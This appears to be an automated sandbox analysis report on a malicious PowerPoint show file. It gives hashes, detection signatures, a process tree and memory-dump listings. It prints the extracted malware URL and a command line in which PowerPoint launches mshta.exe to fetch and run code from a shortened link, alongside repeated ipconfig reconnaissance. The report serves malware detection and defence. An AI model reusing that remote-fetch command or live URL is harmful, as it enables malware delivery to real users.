Analysis
-
max time kernel
114s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 03:54
Static task
static1
Behavioral task
behavioral1
Sample
a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps
Resource
win10v2004-20220414-en
General
-
Target
a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps
-
Size
65KB
-
MD5
b3955e1cda42b669f89dd5f2ece4534e
-
SHA1
3e369400e83d66ebc6e704c6e2b7892f5907473f
-
SHA256
a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151
-
SHA512
9b82c26b9dd9d1f617a38922cfa058ee40d491b4b46fefd60238934e576859a54ae3ca534763649b25b1caea76c69f2800a21a3ade75420acff87608763d97ad
Malware Config
Extracted
http://%20%20@j.mp/asdasjASDASDxaksxm
Signatures
-
Process spawned unexpected child process 17 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exemshta.exeipconfig.exeipconfig.exeipconfig.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2304 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3488 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4024 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2196 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1256 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 764 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1180 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 668 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3944 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3592 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3440 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3040 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3912 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 5064 2744 mshta.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1768 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2920 2744 ipconfig.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4716 2744 ipconfig.exe POWERPNT.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 21 5064 mshta.exe 23 5064 mshta.exe 26 5064 mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Gathers network information 2 TTPs 16 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exepid process 2304 ipconfig.exe 3944 ipconfig.exe 3912 ipconfig.exe 1768 ipconfig.exe 4716 ipconfig.exe 3488 ipconfig.exe 2196 ipconfig.exe 1180 ipconfig.exe 3440 ipconfig.exe 2920 ipconfig.exe 4024 ipconfig.exe 1256 ipconfig.exe 3592 ipconfig.exe 764 ipconfig.exe 668 ipconfig.exe 3040 ipconfig.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 2744 POWERPNT.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
POWERPNT.EXEpid process 2744 POWERPNT.EXE 2744 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
POWERPNT.EXEdescription pid process target process PID 2744 wrote to memory of 2304 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 2304 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3488 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3488 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 2196 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 2196 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 4024 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 4024 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 1256 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 1256 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3944 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3944 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 764 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 764 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 1180 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 1180 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 668 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 668 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3592 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3592 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3440 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3440 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3912 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3912 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3040 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 3040 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 5064 2744 POWERPNT.EXE mshta.exe PID 2744 wrote to memory of 5064 2744 POWERPNT.EXE mshta.exe PID 2744 wrote to memory of 1768 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 1768 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 2920 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 2920 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 4716 2744 POWERPNT.EXE ipconfig.exe PID 2744 wrote to memory of 4716 2744 POWERPNT.EXE ipconfig.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a620c6c8eba080f448a230549de1e4653c7c9d661f7774b630e6d300edadf151.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http:\\%20%20@j.mp\asdasjASDASDxaksxm2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
-
C:\Windows\SYSTEM32\ipconfig.exeipconfig2⤵
- Process spawned unexpected child process
- Gathers network information
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/668-145-0x0000000000000000-mapping.dmp
-
memory/764-143-0x0000000000000000-mapping.dmp
-
memory/1180-144-0x0000000000000000-mapping.dmp
-
memory/1256-141-0x0000000000000000-mapping.dmp
-
memory/1768-151-0x0000000000000000-mapping.dmp
-
memory/2196-139-0x0000000000000000-mapping.dmp
-
memory/2304-137-0x0000000000000000-mapping.dmp
-
memory/2744-158-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-159-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-136-0x00007FFD3E940000-0x00007FFD3E950000-memory.dmpFilesize
64KB
-
memory/2744-135-0x00007FFD3E940000-0x00007FFD3E950000-memory.dmpFilesize
64KB
-
memory/2744-134-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-133-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-131-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-132-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-157-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-160-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2744-130-0x00007FFD40E70000-0x00007FFD40E80000-memory.dmpFilesize
64KB
-
memory/2920-152-0x0000000000000000-mapping.dmp
-
memory/3040-149-0x0000000000000000-mapping.dmp
-
memory/3440-147-0x0000000000000000-mapping.dmp
-
memory/3488-138-0x0000000000000000-mapping.dmp
-
memory/3592-146-0x0000000000000000-mapping.dmp
-
memory/3912-148-0x0000000000000000-mapping.dmp
-
memory/3944-142-0x0000000000000000-mapping.dmp
-
memory/4024-140-0x0000000000000000-mapping.dmp
-
memory/4716-153-0x0000000000000000-mapping.dmp
-
memory/5064-150-0x0000000000000000-mapping.dmp